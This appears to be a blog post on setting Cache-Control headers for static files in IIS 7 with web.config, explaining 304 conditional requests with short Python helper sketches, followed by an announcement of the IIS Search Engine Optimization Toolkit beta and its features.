In IIS 7 this is trivial to fix: just drop a web.config file that specifies the caching behavior into the directory where your images, scripts and CSS styles live. The following web.config sends the Cache-Control header so that the browser caches the responses for up to 7 days.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <staticContent>
      <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
    </staticContent>
  </system.webServer>
</configuration>
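The cacheControlMaxAge value uses the .NET TimeSpan format (days.hours:minutes:seconds), while the Cache-Control header expresses max-age in seconds: 7 × 24 × 60 × 60 = 604,800. This Python sketch does that arithmetic for the common forms only (no fractional seconds); `max_age_header` is a hypothetical helper, and it assumes the header takes the form max-age=<seconds>, which you can confirm by inspecting a response with Fiddler.

```python
import re

# "d.hh:mm:ss" with the day part optional, e.g. "7.00:00:00" or "01:30:00"
_TIMESPAN = re.compile(r"^(?:(\d+)\.)?(\d{1,2}):(\d{2}):(\d{2})$")


def max_age_header(timespan):
    """Convert a cacheControlMaxAge value into the Cache-Control header it stands for."""
    match = _TIMESPAN.match(timespan)
    if match is None:
        raise ValueError(f"unsupported time span: {timespan!r}")
    days, hours, minutes, seconds = (int(part or 0) for part in match.groups())
    total = ((days * 24 + hours) * 60 + minutes) * 60 + seconds
    return f"Cache-Control: max-age={total}"
```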

You can also do this through the UI (IIS Manager) by going to the "HTTP Response Headers" feature -> Set Common Headers..., or through any of our APIs using managed code, JavaScript or your favorite language:

http://www.iis.net/ConfigReference/system.webServer/staticContent/clientCache

Furthermore, using the same query in the Query Builder you can group by directory and find the directories where this is really worth adding. To do that, just click the "Group by" button and add URL-Directory to the Group by clauses. Not surprisingly, in my case it flags the App_Themes directory, where I store 8 images.
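Outside the tool, the same grouping takes only a few lines. A Python sketch, assuming you have the list of flagged image URLs (for example, exported from the query results); `directory_of` and `count_by_directory` are hypothetical helpers.

```python
from collections import Counter
from urllib.parse import urlsplit


def directory_of(url):
    """Directory part of a URL path, with a trailing slash ("/" for root-level files)."""
    path = urlsplit(url).path
    return path.rsplit("/", 1)[0] + "/"


def count_by_directory(urls):
    """Count URLs per directory, most crowded directories first."""
    return Counter(directory_of(url) for url in urls).most_common()
```

The directories at the top of the list are the best candidates for a web.config with a clientCache element.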

[Image: query results grouped by URL-Directory]

 

Finally, what about 304's?

Note that even if you do nothing, most modern browsers will use conditional requests to reduce latency when they have a copy in their cache. For example, imagine the browser needs to display logo.gif as part of displaying test.htm, and that image is available in its cache; the browser will issue a request like this:

GET /logo.gif HTTP/1.1
Accept: */*
Referer: http://carlosag-client/test.htm
Accept-Language: en-us
User-Agent: (whatever-browser-you-are-using)
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
If-None-Match: "01c13f951cac81:0"
Host: carlosagdev:8080
Connection: Keep-Alive

Note the If-Modified-Since header, which tells the server to send the actual data only if it has changed after that time (If-None-Match does the same using the ETag). In this case it hasn't, so the server responds with status code 304 (Not Modified):

HTTP/1.1 304 Not Modified
Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
Accept-Ranges: bytes
ETag: "01c13f951cac81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 07 Jun 2009 06:33:51 GMT
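The server side of that exchange boils down to a small decision. A simplified Python sketch, assuming exact (strong) ETag comparison and well-formed dates; `conditional_status` is a hypothetical helper, and real servers such as IIS handle more cases, such as weak validators and malformed headers.

```python
from email.utils import parsedate_to_datetime


def conditional_status(request_headers, etag, last_modified):
    """Decide between 304 and 200 for a GET, given the resource's ETag and Last-Modified."""
    if_none_match = request_headers.get("If-None-Match")
    if if_none_match is not None:
        # When both validators are sent, If-None-Match takes precedence (RFC 7232)
        tags = [tag.strip() for tag in if_none_match.split(",")]
        return 304 if etag in tags or "*" in tags else 200
    if_modified_since = request_headers.get("If-Modified-Since")
    if if_modified_since is not None:
        unchanged = parsedate_to_datetime(last_modified) <= parsedate_to_datetime(if_modified_since)
        return 304 if unchanged else 200
    return 200
```

With the request headers and the ETag/Last-Modified values from the exchange above, it returns 304, matching the server's response.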

Even though this helps, it still requires a full round trip to the server. The response is short, but it can still have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file the browser needs in order to display the page correctly, or an <img> tag that does not include its dimensions (width and height attributes) and therefore requires the actual image to determine the space it needs (one reason why you should always specify the dimensions in markup to improve rendering performance).

Summary

To summarize, with the IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your Web site, letting you find details that would otherwise be tedious to track down. In this case I showed how easy it is to find all the images that do not specify any caching headers, and you can do the same for scripts (replacing the image criterion with Content Type Normalized Equals application/javascript) or styles (Content Type Normalized Equals text/css). This way you can improve rendering performance and reduce the overall bandwidth of your Web site.


Today we are releasing the IIS Search Engine Optimization Toolkit. The IIS SEO Toolkit is a set of features that aim to help you keep your Web site and its content in good shape for both Users and Search Engines.

The features included in this Beta release are:

  • Site Analysis. This feature includes a crawler that starts looking at your Web site contents, discovering links, downloading the contents and applying a set of validation rules aimed to help you easily troubleshoot common problems such as broken links, duplicate content, keyword analysis, route analysis and many more features that will help you improve the overall quality of your Web site.
  • Robots Exclusion Editor. This includes a powerful editor to author Robots Exclusion files. It can leverage the output of a Site Analysis crawl report and allow you to easily add the Allow and Disallow entries without having to edit a plain text file, making it less error prone and more reliable. Furthermore, you can run the Site Analysis feature again and see immediately the results of applying your robots files.
  • Sitemap and Sitemap Index Editor. Similar to the Robots editor, this allows you to author Sitemap and Sitemap Index files, with the ability to discover both the physical view and the logical view (Site Analysis crawler report) of your site.
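The editor produces these files for you; purely to show what a minimal sitemap contains, here is a Python sketch using the standard library's ElementTree and the sitemaps.org 0.9 namespace. `build_sitemap` is a hypothetical helper and the example.com URLs are placeholders; it writes only the required loc element per URL, and ElementTree takes care of escaping characters such as & in query strings.

```python
import xml.etree.ElementTree as ET

SITEMAP_NS = "http://www.sitemaps.org/schemas/sitemap/0.9"


def build_sitemap(urls):
    """Return UTF-8 sitemap XML (bytes) listing each URL once, in the given order."""
    urlset = ET.Element("urlset", xmlns=SITEMAP_NS)
    for url in dict.fromkeys(urls):  # drop duplicates, keep the original order
        ET.SubElement(ET.SubElement(urlset, "url"), "loc").text = url
    return ET.tostring(urlset, encoding="utf-8", xml_declaration=True)


if __name__ == "__main__":
    print(build_sitemap(["http://www.example.com/", "http://www.example.com/about.htm"]).decode("utf-8"))
```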

Check out the great blog post about the IIS SEO Toolkit by ScottGu, or this simple IIS SEO video showing some of its capabilities.

Run it in your Development, Staging, or Production Environments

One of the problems with many similar tools out there is that they require you to publish your updates to your production sites before you can even use the tools, and of course they cannot be used for intranet or internal applications that are not exposed to the Web. The IIS Search Engine Optimization Toolkit can be used internally in your own development or staging environments, giving you the ability to clean up the content before publishing to the Web. This way your users do not pay the price of broken links once you publish, and you do not need to wait for those tools or search engines to crawl your site to finally discover that you broke things.

For developers this means they can now easily see the potential impact of removing or renaming a file: which files refer to that page, and which files they could also remove because they are referenced only by that page.
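Both questions are queries over the site's link graph. A Python sketch, assuming a hypothetical `links` mapping from each crawled page to the set of URLs it links to (the kind of data a crawl collects); `referrers` and `only_referenced_by` are illustrative helpers, not toolkit APIs.

```python
from collections import defaultdict


def referrers(links):
    """Invert `links` (page -> pages it links to) into page -> pages that link to it."""
    inbound = defaultdict(set)
    for page, targets in links.items():
        for target in targets:
            inbound[target].add(page)
    return inbound


def only_referenced_by(page, links):
    """Pages whose sole inbound link comes from `page`: candidates to remove along with it."""
    inbound = referrers(links)
    return sorted(target for target, sources in inbound.items() if sources == {page})
```

Before deleting a page, `referrers(links)[page]` tells you which pages will end up with broken links, and `only_referenced_by(page, links)` lists resources that would become orphaned.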

Run it against any Web application built on any framework running in any server

One thing that is important to clarify is that you can also target and analyze your production sites if you want to, and you can target Web applications running on any platform, whether it's ASP.NET, PHP, or plain HTML files, running in your local IIS or on any other remote server.

Bottom line: try it against your Web site, look at the different features, and give us feedback on additional reports, options, violations, content to parse, etc. Post any comments or questions at the IIS Search Engine Optimization Forum.

The IIS SEO Toolkit documentation can be found at http://learn.iis.net/page.aspx/639/using-iis-search-engine-optimization-toolkit/, but remember this is only Beta 1 so we will be adding more features and content.

IIS Search Engine Optimization Toolkit
